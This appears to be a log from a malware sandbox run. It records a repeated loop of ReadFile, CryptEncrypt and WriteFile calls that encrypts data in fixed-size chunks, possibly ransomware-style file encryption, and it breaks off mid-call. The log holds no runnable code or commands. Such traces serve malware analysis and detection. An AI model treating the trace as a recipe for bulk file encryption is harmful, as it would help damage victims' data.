[0246.017] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.017] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.017] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.018] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.018] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.019] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.019] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.020] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.020] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.020] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.020] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.021] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.021] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.022] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.022] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.023] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.024] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, 